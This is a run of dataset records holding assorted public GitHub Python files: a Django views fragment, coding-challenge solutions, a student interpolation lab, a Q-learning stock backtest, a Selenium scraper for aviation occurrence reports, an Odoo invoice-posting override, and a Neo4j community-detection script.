print(post)\n\n\nlo = SigninView()\nlo.post(username=\"django\", email=\"django@123\")\npst = PostCreateView()\npst.post(title=\"my post\", body=\"this is my post\")\n\ndetail = PostDetailsView()\ndetail.put(id=10, title=\"my post\", body=\"this is my new post\")\nmp = MyPostsView()\nprint(mp.get())\n\n\npl = PostListView()\ns = pl.get()\n# try:\n# allposts=pl.get()\n# except Exception as e:\n# print(e)\n","repo_name":"jitheshlaledk/python","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25009261458","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'taskOfPairing' function below.\n#\n# The function is expected to return a LONG_INTEGER.\n# The function accepts LONG_INTEGER_ARRAY freq as parameter.\n#\n\ndef taskOfPairing(freq):\n # Write your code here\n count = 0\n unused = False\n for i in freq:\n if i != 0:\n count += i // 2\n if i % 2 != 0:\n if unused:\n count += 1\n unused = False\n else:\n unused = True\n else:\n unused = False\n return count\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n freq_count = int(input().strip())\n\n freq = []\n\n for _ in range(freq_count):\n freq_item = 
int(input().strip())\n freq.append(freq_item)\n\n result = taskOfPairing(freq)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"lighterland/hari-hari-python","sub_path":"hackerrank/certification/problem solving (intermediate)/task-of-pairing.py","file_name":"task-of-pairing.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1440291150","text":"# By submitting this assignment, I agree to the following:\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do.\"\n# \"I have not given or received any unauthorized aid on this assignment.\"\n#\n# Name: Ezra Jeter\n# Section: 213\n# Team: YOUR TEAM NUMBER\n# Assignment: Lab 3a Activity 2\n# Date: 20 September 2021\n\n# variables for each input of time and position\n\n#function which takes in inputs for time and position and inserts them into the interpolation formula\ndef interpolate(t,t1,t2,x1,x2,y1,y2,z1,z2):\n x = x1 + (t-t1) * (x2 - x1) / (t2 - t1)\n y = y1 + (t-t1) * (y2 - y1) / (t2 - t1)\n z = z1 + (t-t1) * (z2 - z1) / (t2 - t1)\n print('At time {:.1f} seconds the object is at ({:.2f}, {:.2f}, {:.2f})'.format(t,x,y,z))\n#user inputs for time and position\ntime1 = float(input('Enter time 1: '))\nx_pos1 = float(input('Enter the x position of the object at time 1: '))\ny_pos1 = float(input('Enter the y position of the object at time 1: '))\nz_pos1 = float(input('Enter the z position of the object at time 1: '))\ntime2 = float(input('Enter time 2: '))\nx_pos2 = float(input('Enter the x position of the object at time 2: '))\ny_pos2 = float(input('Enter the y position of the object at time 2: '))\nz_pos2 = float(input('Enter the z position of the object at time 2: '))\nprint('')\n\n#values of interest between inputted time values \nincrement = (time2 - time1) / 4\n\ntime_of_interest = time1\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)\n\ntime_of_interest += increment\ninterpolate(time_of_interest,time1,time2,x_pos1,x_pos2,y_pos1,y_pos2,z_pos1,z_pos2)","repo_name":"ohKodiak/PythonWork","sub_path":"Lab3a_Act2.py","file_name":"Lab3a_Act2.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6623014704","text":"import numpy as np\nimport pandas as pd\n\nfrom rlmodel import strategylearner as sl\nimport Indicators as ind\n\n\nimport yfinance as yf\nfrom pandas_datareader import data as pdr\n\nyf.pdr_override() # configure pandas datareader to query yahoo finance\n\n\ndef get_stock_data( # pylint: disable=dangerous-default-value\n start_date: pd.Timestamp,\n end_date: pd.Timestamp,\n ticker: str = \"AAPL\", # type: ignore\n) -> pd.DataFrame:\n \"\"\"Wrapper for querying data through pandas datareader\"\"\"\n\n data_close_df: pd.DataFrame = pdr.get_data_yahoo(\n ticker, start=start_date, end=end_date\n )[\n [\"Adj Close\", \"Volume\"]\n ] # type: ignore\n return data_close_df\n\n\ndef compute_portvals(\n symbol: str = \"JPM\",\n start_date: pd.Timestamp = pd.Timestamp(\"2010-01-01\"),\n end_date: pd.Timestamp = 
pd.Timestamp(\"2011-12-31\"),\n orders: pd.DataFrame = pd.DataFrame(),\n start_val: float = 100000.0,\n commission: float = 9.95,\n impact: float = 0.005,\n):\n prices: pd.DataFrame = get_stock_data(start_date, end_date, symbol)\n prices.dropna(inplace=True)\n # get all stock symbols\n\n prices[\"cash\"] = 1.0\n orders[\"multiplier\"] = orders[\"Order\"].apply(lambda x: 1.0 if x == \"BUY\" else -1.0)\n orders[\"Shares\"] = orders[\"Shares\"] * orders[\"multiplier\"]\n orders.drop([\"Order\", \"multiplier\"], axis=1, inplace=True)\n\n # !!! TRADES HAS TO BE A GROUP BY AND NOT PIVOT TABLE!!!\n b = (\n orders.groupby([orders.index.get_level_values(0), \"Symbol\"])[[\"Shares\"]]\n .sum()\n .reset_index()\n )\n b.columns = [\"Date\", \"Symbol\", \"Shares\"]\n b.set_index(\"Date\", inplace=True)\n trades = b.pivot_table(\n values=\"Shares\", index=[\"Date\"], columns=[\"Symbol\"], fill_value=0\n )\n\n # trades = orders.pivot_table(values='Shares', index=['Date'], columns=['Symbol'],fill_value=0)\n empty = pd.DataFrame(index=prices.index)\n trades = pd.merge(empty, trades, how=\"left\", left_index=True, right_index=True)\n trades.fillna(0, inplace=True)\n trades = trades[sorted(trades.columns)]\n\n x = orders.reset_index().values\n trades[\"cash\"] = 0.0\n\n for i in x:\n trades.at[i[0], \"cash\"] += -(\n i[1] * prices.at[i[0], symbol]\n + commission\n + abs(i[1] * prices.at[i[0], symbol] * impact)\n )\n\n holdings = trades.copy()\n holdings.iloc[0, -1] = start_val + trades.iloc[0, -1]\n holdings = holdings.cumsum()\n\n values = prices * holdings\n\n portval = pd.DataFrame(values.sum(axis=1))\n\n portval.columns = [\"manual\"]\n\n return portval, values, holdings, trades, prices\n\n\ndef benchmarking(symbol=\"JPM\", sd=\"2010-01-01\", ed=\"2011-12-31\", start_val=100000.0):\n prices = ind.getStock(symbol, sd, ed)\n prices.dropna(inplace=True)\n\n prices[\"bench\"] = 1000.0 * prices[symbol]\n prices[\"bench\"] = prices[\"bench\"] + (start_val - 1000.0 * prices[symbol][0])\n prices[\"Benchmark\"] = prices[\"bench\"] / prices[\"bench\"][0]\n benchmark_cr = round(\n ((prices[\"Benchmark\"][-1] / prices[\"Benchmark\"][0]) - 1) * 100.0, 3\n )\n\n prices[\"normal\"] = np.log(prices[\"bench\"] / prices[\"bench\"].shift(1))\n\n bench = prices[[\"Benchmark\"]]\n return bench, benchmark_cr\n\n\ndef qLearning(\n symbol=\"JPM\",\n train_sd: pd.Timestamp = pd.Timestamp(\"2008-01-01\"),\n train_ed: pd.Timestamp = pd.Timestamp(\"2009-12-13\"),\n test_sd: pd.Timestamp = pd.Timestamp(\"2010-01-01\"),\n test_ed: pd.Timestamp = pd.Timestamp(\"2011-12-31\"),\n impact: float = 0.0,\n commission: float = 0.0,\n epochs: int = 100,\n dyna: int = 20,\n sv: int = 100000,\n):\n learner = sl.StrategyLearner(verbose=False, impact=0.0, dyna=dyna, epochs=epochs)\n learner.addEvidence(\n symbol=symbol, sd=train_sd, ed=train_ed, sv=sv\n ) # training phase\n\n df_trades = learner.testPolicy(symbol=symbol, sd=test_sd, ed=test_ed, sv=sv)\n df_trades = df_trades[df_trades[\"shares\"] != 0]\n df_trades[\"Order\"] = np.where(df_trades[\"shares\"] > 0, \"BUY\", \"SELL\")\n df_trades[\"Symbol\"] = symbol\n df_trades.columns = [\"Shares\", \"Order\", \"Symbol\"]\n df_trades[\"Shares\"] = df_trades[\"Shares\"].abs()\n\n ql_out, values, holdings, trades, prices = compute_portvals(\n symbol, test_sd, test_ed, df_trades, sv, commission=commission, impact=impact\n )\n\n ql_out.columns = [\"Q Learning\"]\n\n benchmark, benchmark_cr = benchmarking(\n symbol=symbol, sd=test_sd, ed=test_ed, start_val=sv\n )\n\n benchmark.columns = 
[\"Benchmark\"]\n\n ql_out_cr = round(\n ((ql_out[\"Q Learning\"][-1] / ql_out[\"Q Learning\"][0]) - 1) * 100.0, 3\n )\n\n ql_out[\"Q Learning\"] = ql_out[\"Q Learning\"] / ql_out[\"Q Learning\"][0]\n\n print(\"*****************\")\n print(\"Out Sample\")\n print(\n \"Buy-and-Hold strategy return for out-sample data is: \"\n + str(benchmark_cr)\n + \"%\"\n )\n print(\"Q Learning strategy return for out-sample data is: \" + str(ql_out_cr) + \"%\")\n print(\"\\n\")\n\n return ql_out.join(benchmark) # ql_out, ql_out_cr, benchmark, benchmark_cr\n","repo_name":"crivera2013/invest-dash","sub_path":"rlmodel/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38117400121","text":"import uuid\nimport os\nimport json\nfrom bs4 import BeautifulSoup\nfrom .utils import Utils\nfrom pathlib import Path\nimport re\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\n\nclass CADORSQueryScrapper:\n def __init__(self, config: dict):\n \"\"\"\n [\n Class to fetch page urls from the search page\n ]\n\n Args:\n config ([dict]): [Configuration path to provide configuration details]\n \"\"\"\n self.driver = None\n self.options = {}\n self.occurance_url = None\n self.items_per_page = -1\n self.current_page = int(config[\"url_scrape_start\"])\n self.current_item = 0\n self.occurances = -1\n self.current_batch = 1\n self.url_scrape_limit = int(config[\"url_scrape_limit\"])\n self.batch_size = int(config[\"batch_size\"])\n self.base_url = config[\"base_url\"] + config[\"query_page_extension\"]\n self.driver_path = config[\"driver_path\"]\n self.occurances_output_folder = config[\"occurances_output_folder\"]\n\n # checking if output folder exists else creating one\n Path(config[\"occurances_output_folder\"]).mkdir(parents=True, exist_ok=True)\n\n self.urls = []\n\n def _get_summary_results(self):\n \"\"\"\n [\n Function to get summary results after searching\n ]\n\n Returns:\n [tuple]: [\n (\n driver -> Driver of the particular web page\n driver.current_url -> Current url of the driver\n int(Utils.get_numbers(occurance_text)[-1]) -> Get number of occurances on the page\n int(ids_per_page_element.get_attribute(\"value\")) -> Get number of ids per page\n )\n ]\n \"\"\"\n options = Options()\n options.headless = False\n options.add_argument(\"--window-size=1920,1200\")\n\n driver = webdriver.Chrome(executable_path=self.driver_path, options=options)\n driver.get(self.base_url)\n\n # the logic of date ranges goes here\n\n search_btn = driver.find_element(By.ID, \"btn_SearchTop\")\n search_btn.click()\n\n wait = WebDriverWait(driver, 240)\n # print(\"Waiting to get Summary results....\")\n wait.until(\n lambda x: x.find_element(\n By.XPATH, \"//*[contains(text(), ': Summary Results')]\"\n )\n )\n\n occurance_element = driver.find_element(\n By.XPATH, \"//div[@class='col-md-6 mrgn-bttm-md form-inline']\"\n )\n occurance_text = occurance_element.text\n\n ids_per_page_element = driver.find_element(By.ID, \"hidRecordsPerPage\")\n\n input_top = driver.find_element(By.ID, \"txtTopPageNumber\")\n driver.execute_script(\"arguments[0].value=''\", input_top)\n input_top.send_keys(str(self.current_page))\n go_btn = 
driver.find_element(By.ID, \"btnGoToPage\")\n go_btn.click()\n # print(driver.current_url)\n\n return (\n driver,\n options,\n driver.current_url,\n int(Utils.get_numbers(occurance_text)[-1]),\n 15\n # int(ids_per_page_element.get_attribute(\"value\")),\n )\n\n def scrape_occurances(self):\n \"\"\"\n [\n Function to scrape page occurances on the page\n ]\n \"\"\"\n (\n self.driver,\n self.options,\n self.occurance_url,\n self.occurances,\n self.items_per_page,\n ) = self._get_summary_results()\n\n while self.current_page <= self.occurances:\n # the scraping of all the occurances hasn't completed yet.\n\n element = self.driver.find_element(\n By.ID,\n \"ContentPlaceHolder1_rpt_CADORS_hyp_CADORSNum_\"\n + str(self.current_item),\n )\n self.urls.append(element.get_attribute(\"href\"))\n\n self.current_item += 1\n # print(f\"URLS fetched: {self.urls[-1]}\")\n # print(self.current_item)\n\n if self.current_item == self.items_per_page:\n # End of page\n\n # writing it to files\n if self.current_batch == self.batch_size:\n # print(\"Printing the occurances\")\n self._write_occurances_files(self.urls)\n self.urls = []\n self.current_batch = 0\n\n print(\"CURRENT PAGE: \", self.current_page)\n if self.current_page == self.url_scrape_limit:\n if self.urls:\n self._write_occurances_files(self.urls)\n break\n\n next_button = self.driver.find_element(By.ID, \"btnNextTop\")\n # print(\"Clicking the next button\")\n next_button.click()\n\n wait = WebDriverWait(self.driver, 240)\n wait.until(\n lambda x: int(\n Utils.get_numbers(\n x.find_element(\n By.XPATH,\n \"//div[@class='col-md-6 mrgn-bttm-md form-inline']\",\n ).text\n )[0]\n )\n == self.current_page + 1\n )\n self.current_page += 1\n self.current_batch += 1\n self.current_item = 0\n\n def _write_occurances_files(self, occurances: list):\n \"\"\"\n Function to write all occurance urls to files\n\n Args:\n occurances (list): [List of all occurance urls for incidents]\n \"\"\"\n # print(\"Trying to print the occurances\")\n with open(\n os.path.join(self.occurances_output_folder, str(uuid.uuid4()) + \".json\"),\n \"w\",\n ) as f:\n json.dump(occurances, f)\n\n\nclass CADORSPageScrapper:\n def __init__(self, url: str, config: dict) -> None:\n \"\"\"\n [\n Class to scrape information of a particular page\n ]\n Args:\n url ([str]): [Url of the page to scrape information from]\n config ([dict]): [Configuration path to provide configuration details]\n \"\"\"\n options = Options()\n options.headless = True\n options.add_argument(\"--window-size=1920,1200\")\n\n driver = webdriver.Chrome(\n executable_path=config[\"driver_path\"], options=options\n )\n driver.get(url)\n\n self.driver = driver\n self.url = url\n self.items_parsed = 0\n self.page_data = {}\n\n def scrape_data(self):\n \"\"\"\n Function to scrape data from the page\n \"\"\"\n\n cadors_report_soup = BeautifulSoup(self.driver.page_source, \"html5lib\")\n primary_panel_body = cadors_report_soup.find(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary\"}\n )\n\n record_no = int(\n Utils.get_numbers(\n primary_panel_body.find(\n \"header\", attrs={\"class\": \"text-danger\"}\n ).getText()\n )[0]\n )\n self.page_data[\"record_no\"] = record_no\n\n # fetching the main panel body\n panel_body = primary_panel_body.find(\"div\", attrs={\"class\": \"panel-body\"})\n\n # fetching CADORS Number and Occurance Category\n cadors_row = panel_body.find(\"div\", attrs={\"class\": \"row\"})\n (\n cadors_number_txt,\n cadors_number_val,\n occurance_category_txt,\n occurance_category_val,\n ) = 
cadors_row.findAll(\"div\", attrs={\"class\": \"col-md-3 mrgn-bttm-sm\"})\n\n cadors_number_val = Utils.clean_text(cadors_number_val.text)\n occurance_category_val = Utils.clean_text(occurance_category_val.text)\n\n temp = panel_body.find(\"div\", attrs={\"class\": \"row\"})\n t = 0\n for ele in temp.findAll(\"div\", attrs={\"class\": \"col-md-3 mrgn-bttm-sm\"}):\n x = ele.text\n x = re.sub(\" +\", \" \", x)\n x = x.strip()\n t += 1\n if t == 2:\n cador_no = x\n if t==4:\n occat=[]\n for li in ele.find('ul'):\n ltxt = li.text\n ltxt = re.sub(\" +\", \" \", ltxt)\n ltxt = ltxt.strip()\n # print(ltxt,len(ltxt))\n if len(ltxt)!=0:\n occat.append(ltxt)\n \n self.page_data[\"CADORS Number\"] = cador_no\n self.page_data['Occurrence Category']= occat\n self.page_data['Occurrence Summary']=[]\n \n \n for ele in panel_body.findAll(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary\"}\n ):\n head = ele.find(\"div\", attrs={\"class\": \"well well-sm\"}).text\n res = re.sub(\" +\", \" \", head)\n res = res.strip()\n # print('\\n',res,len(res),'\\n')\n if res == \"Occurrence Information\":\n occurance_information_section_panel_body = ele.find(\n \"div\", attrs={\"class\": \"panel-body\"}\n )\n key, val = None, None\n cnt = 0\n\n for row in occurance_information_section_panel_body.findAll(\n \"div\", attrs={\"class\": \"row\"}\n ):\n\n items = row.findAll(\n \"div\", class_=[\"col-md-3 mrgn-bttm-md\", \"col-md-4 mrgn-bttm-md\"]\n )\n\n for item in items:\n if cnt % 2 == 0:\n key = Utils.clean_text(item.text)\n\n else:\n val = Utils.clean_text(item.text)\n\n self.page_data[key] = val\n cnt += 1\n occurance_event_info = occurance_information_section_panel_body.find(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary bullet_left_15px\"}\n )\n # print(occurance_event_info)\n occ_event=[]\n if occurance_event_info.find(\"ul\") is not None:\n for li in occurance_event_info.find(\"ul\"):\n ltxt = li.text\n ltxt = re.sub(\" +\", \" \", ltxt)\n ltxt = ltxt.strip()\n if len(ltxt)!=0:\n occ_event.append(ltxt)\n self.page_data['Occurrence Event Information'] = occ_event\n elif res == \"Occurrence Summary\":\n a = ele.findAll(\"div\", attrs={\"class\": \"col-md-3 mrgn-bttm-md\"})\n for i in a:\n x = i.text\n x = re.sub(\" +\", \" \", x)\n x = x.strip()\n if x != \"Date Entered:\" and x != \"Narrative:\":\n date = x\n break\n b = ele.find(\n \"div\", attrs={\"class\": \"col-md-8 mrgn-bttm-md width-670px\"}\n ).text\n b = re.sub(\" +\", \" \", b)\n summary = b.strip()\n # print('\\n','Date:\\n',date,'--',len(date),'\\n','Summary:\\n',summary,'--',len(summary),'\\n')\n # os_g.append({\"Date\": date, \"Summary\": summary})\n self.page_data[\"Occurrence Summary\"].append({\"Date\": date, \"Summary\": summary})\n elif res=='Aircraft Information':\n air_info_single={}\n aircraft_information_section_panel_body = ele.find(\n \"div\", attrs={\"class\": \"panel-body\"}\n ) \n key, val = None, None\n for row in aircraft_information_section_panel_body.findAll(\n \"div\", attrs={\"class\": \"row\"}\n ):\n items = row.findAll(\n \"div\", class_=[\"col-md-3 mrgn-bttm-md\", \"col-md-4 mrgn-bttm-md\"]\n ) \n cnt=0\n for item in items:\n if cnt % 2 == 0:\n key = Utils.clean_text(item.text)\n air_info_single[key]=[]\n cnt += 1\n \n for row in aircraft_information_section_panel_body.findAll(\n \"div\", attrs={\"class\": \"row\"}\n ):\n items = row.findAll(\n \"div\", class_=[\"col-md-3 mrgn-bttm-md\", \"col-md-4 mrgn-bttm-md\"]\n ) \n cnt=0\n for item in items:\n if cnt % 2 == 0:\n key = 
Utils.clean_text(item.text)\n elif cnt % 2 != 0:\n val = Utils.clean_text(item.text)\n # print(val)\n air_info_single[key].append(val)\n cnt += 1\n \n air_info_single['Aircraft Event Information']=[] \n aircraft_event_info = aircraft_information_section_panel_body.findAll(\n \"section\", attrs={\"class\": \"mrgn-bttm-sm panel panel-primary bullet_left_15px\"}\n ) \n for airevent in aircraft_event_info:\n # print(airevent)\n aircraft_event=[]\n if airevent.find(\"ul\") is not None:\n for li in airevent.find(\"ul\"):\n ltxt = li.text\n ltxt = re.sub(\" +\", \" \", ltxt)\n ltxt = ltxt.strip()\n if len(ltxt)!=0:\n aircraft_event.append(ltxt)\n air_info_single['Aircraft Event Information'].append(aircraft_event)\n \n self.page_data['Aircraft Information']=air_info_single\n return self.page_data\n","repo_name":"kaumil/cmpt_732","sub_path":"api/scraping/scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":14304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5783581462","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools import float_compare\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n \n sponsor_id = fields.Many2one('res.partner')\n campo_vacio = fields.Boolean('Campo vacio', default=False) \n \n payulatam_order_id = fields.Char('ID de Orden de PayU')\n payulatam_transaction_id = fields.Char('ID de Transacción de PayU')\n payulatam_signature = fields.Char('Signature de la Transacción')\n payulatam_state = fields.Char('Estado Transacción de PayU')\n payulatam_datetime = fields.Datetime('Fecha y Hora de la Transacción')\n payulatam_credit_card_token = fields.Char('Token Para Tarjetas de Crédito')\n payulatam_credit_card_masked = fields.Char('Mascara del Número de Tarjeta')\n payulatam_credit_card_identification = fields.Char('Identificación')\n payulatam_credit_card_method = fields.Char('Metodo de Pago')\n payulatam_request_expired = fields.Boolean('Request Expired')\n state = fields.Selection(selection_add=[('finalized', 'Finalizado')], selection_remove=['payu_pending','payu_approved'])\n# main_product_id = fields.Many2one('product.product', string=\"Plan Elegido\", compute=\"_compute_main_product_id\", store=True)\n payment_method_type = fields.Selection([\n (\"Credit Card\", \"Tarjeta de Crédito\"), \n (\"Cash\", \"Efectivo\"), \n (\"PSE\", \"PSE\"),\n (\"Product Without Price\", \"Producto con Precio $0\"),\n ])\n \n \n def post(self):\n # `user_has_group` won't be bypassed by `sudo()` since it doesn't change the user anymore.\n if not self.env.su and not self.env.user.has_group('account.group_account_invoice'):\n raise AccessError(_(\"You don't have the access rights to post an invoice.\"))\n for move in self:\n if not move.sponsor_id.generates_accounting:\n to_write = {'state': 'finalized'}\n move.write(to_write)\n if move.name == '/':\n # Get the journal's sequence.\n sequence = move._get_sequence()\n if not sequence:\n raise UserError(_('Please define a sequence on your journal.'))\n\n # Consume a new number.\n to_write['name'] = sequence.with_context(ir_sequence_date=move.date).next_by_id()\n\n move.write(to_write)\n return True\n if move.state == 'posted':\n raise UserError(_('The entry %s (id %s) is already posted.') % (move.name, move.id))\n if not move.line_ids.filtered(lambda line: not line.display_type):\n raise UserError(_('You need to 
add a line before posting.'))\n if move.auto_post and move.date > fields.Date.today():\n date_msg = move.date.strftime(get_lang(self.env).date_format)\n raise UserError(_(\"This move is configured to be auto-posted on %s\" % date_msg))\n\n if not move.partner_id:\n if move.is_sale_document():\n raise UserError(_(\"The field 'Customer' is required, please complete it to validate the Customer Invoice.\"))\n elif move.is_purchase_document():\n raise UserError(_(\"The field 'Vendor' is required, please complete it to validate the Vendor Bill.\"))\n\n if move.is_invoice(include_receipts=True) and float_compare(move.amount_total, 0.0, precision_rounding=move.currency_id.rounding) < 0:\n raise UserError(_(\"You cannot validate an invoice with a negative total amount. You should create a credit note instead. Use the action menu to transform it into a credit note or refund.\"))\n\n # Handle case when the invoice_date is not set. In that case, the invoice_date is set at today and then,\n # lines are recomputed accordingly.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if not move.invoice_date and move.is_invoice(include_receipts=True):\n move.invoice_date = fields.Date.context_today(self)\n move.with_context(check_move_validity=False)._onchange_invoice_date()\n\n # When the accounting date is prior to the tax lock date, move it automatically to the next available date.\n # /!\\ 'check_move_validity' must be there since the dynamic lines will be recomputed outside the 'onchange'\n # environment.\n if (move.company_id.tax_lock_date and move.date <= move.company_id.tax_lock_date) and (move.line_ids.tax_ids or move.line_ids.tag_ids):\n move.date = move.company_id.tax_lock_date + timedelta(days=1)\n move.with_context(check_move_validity=False)._onchange_currency()\n\n # Create the analytic lines in batch is faster as it leads to less cache invalidation.\n self.mapped('line_ids').create_analytic_lines()\n for move in self.sorted(lambda m: (m.date, m.ref or '', m.id)):\n if move.auto_post and move.date > fields.Date.today():\n raise UserError(_(\"This move is configured to be auto-posted on {}\".format(move.date.strftime(get_lang(self.env).date_format))))\n\n move.message_subscribe([p.id for p in [move.partner_id] if p not in move.sudo().message_partner_ids])\n\n to_write = {'state': 'posted'}\n\n if move.name == '/':\n # Get the journal's sequence.\n sequence = move._get_sequence()\n if not sequence:\n raise UserError(_('Please define a sequence on your journal.'))\n\n # Consume a new number.\n to_write['name'] = sequence.with_context(ir_sequence_date=move.date).next_by_id()\n\n move.write(to_write)\n\n # Compute 'ref' for 'out_invoice'.\n if move.type == 'out_invoice' and not move.invoice_payment_ref:\n to_write = {\n 'invoice_payment_ref': move._get_invoice_computed_reference(),\n 'line_ids': []\n }\n for line in move.line_ids.filtered(lambda line: line.account_id.user_type_id.type in ('receivable', 'payable')):\n to_write['line_ids'].append((1, line.id, {'name': to_write['invoice_payment_ref']}))\n move.write(to_write)\n\n if move == move.company_id.account_opening_move_id and not move.company_id.account_bank_reconciliation_start:\n # For opening moves, we set the reconciliation date threshold\n # to the move's date if it wasn't already set (we don't want\n # to have to reconcile all the older payments -made before\n # installing Accounting- with bank statements)\n move.company_id.account_bank_reconciliation_start = 
move.date\n\n for move in self:\n if not move.partner_id: continue\n partners = (move.partner_id | move.partner_id.commercial_partner_id)\n if move.type.startswith('out_'):\n partners._increase_rank('customer_rank')\n elif move.type.startswith('in_'):\n partners._increase_rank('supplier_rank')\n else:\n continue\n\n # Trigger action for paid invoices in amount is zero\n self.filtered(\n lambda m: m.is_invoice(include_receipts=True) and m.currency_id.is_zero(m.amount_total)\n ).action_invoice_paid()\n\n # Force balance check since nothing prevents another module to create an incorrect entry.\n # This is performed at the very end to avoid flushing fields before the whole processing.\n self._check_balanced()\n return True\n \n \n ","repo_name":"lq-todoo/Masmedicos","sub_path":"web_sale_extended/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74876079127","text":"import os\nimport pandas as pd\nfrom py2neo import Graph\nimport ujson\nfrom collections import defaultdict \n\ndef write_results(alg_name, direction, q2):\n results = {}\n\n for item in q2.data():\n results[item['node']['id']] = item['label']\n\n print('1st dict')\n\n mydict = defaultdict(list)\n for k,v in sorted(results.items()):\n mydict[v].append(k)\n\n print('2nd dict')\n\n with open(alg_name + '_' + direction + '_neo4j.txt', 'a') as f:\n f.write(ujson.dumps(mydict))\n\ngraph = Graph('127.0.0.1',password='gomugomuno13')\ntx = graph.begin()\n\nq1 = graph.run('''\n CALL algo.louvain.stream('User', 'TRADES', {\n direction: 'BOTH'\n })YIELD nodeId, community\n RETURN algo.getNodeById(nodeId) as node, community\n ''')\n\nq2 = graph.run('''\n CALL algo.labelPropagation.stream(\"User\", \"TRADES\",\n {direction: \"BOTH\", iterations: 10})\n YIELD nodeId, label\n RETURN algo.getNodeById(nodeId) as node, label\n ''')\n\nprint('query done')\n\nwrite_results('louvain' , 'BOTH', q1)\nwrite_results('label_propagation', 'BOTH', q2)","repo_name":"LeoVogiatzis/GraphAnalysis","sub_path":"community_detection/com_dec_neo.py","file_name":"com_dec_neo.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8519469994","text":"\npositions_to_fuel = {}\n\nif __name__ == '__main__':\n with open('./sample.txt') as f:\n positions = [int(position) for position in f.readline().split(',')]\n maximum = len(positions) - 1\n\n for index, position in enumerate(positions):\n if position not in positions_to_fuel:\n next = min(index + 1, maximum)\n left = positions[:index]\n right = positions[next:]\n \n positions_to_fuel[position] = sum(abs(position - pos) for pos in left) + sum(abs(position - pos) for pos in right)\n \n least_fuel = min(positions_to_fuel.values())\n print(f\"The least amount of fuel used was - {least_fuel}\")","repo_name":"jacob-carrier/advent-of-code-2021","sub_path":"day_7/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25241639802","text":"import sys\n\nn, m = map(int, sys.stdin.readline().strip().split())\narr = list(map(int, sys.stdin.readline().strip().split()))\n\nstart = 1\nend = max(arr)\n\nwhile start <= end:\n mid = (start + end) // 2\n num = 0\n\n for i in arr:\n if mid <= i:\n num += i - mid\n\n if num >= m:\n start = mid + 1\n else:\n end = mid 
- 1\n\nprint(end)\n","repo_name":"juntae6942/ANA-Daily-Algorithm","sub_path":"차영은/BOJ_2805.py","file_name":"BOJ_2805.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"10698192454","text":"import random\r\ndef Game(Computer, You):\r\n if Computer==You:\r\n return None\r\n elif Computer=='s':\r\n if You=='p':\r\n return True\r\n if You=='sc':\r\n return False\r\n elif Computer=='p':\r\n if You=='s':\r\n return False\r\n if You=='sc':\r\n return True\r\n elif Computer=='sc':\r\n if You=='s':\r\n return True\r\n if You=='p':\r\n return False\r\nprint('Computer turn Stone(s), Paper(p), Scissor(sc)')\r\nrandno=random.randint(1,3)\r\nif randno==1:\r\n Computer='s'\r\nelif randno==2:\r\n Computer='p'\r\nelif randno==3:\r\n Computer='sc'\r\nYou=input('Your turn Stone(s), Paper(p), Scissor(sc)\\n')\r\na=Game(Computer,You)\r\nprint(f'computer chose {Computer}')\r\nprint(f'you chose {You}')\r\nif a==None:\r\n print('Game is tie')\r\nelif a:\r\n print('Congratulations! You Win')\r\nelse:\r\n print('You Lost')\r\n\r\n","repo_name":"kiranbandgar/Python-Projects","sub_path":"Stone Paper Scissor Game.py","file_name":"Stone Paper Scissor Game.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26107663775","text":"from typing import Any, Dict, Iterable, List, Union\n\nimport numpy as np\n\nfrom fastestimator.op.numpyop.numpyop import 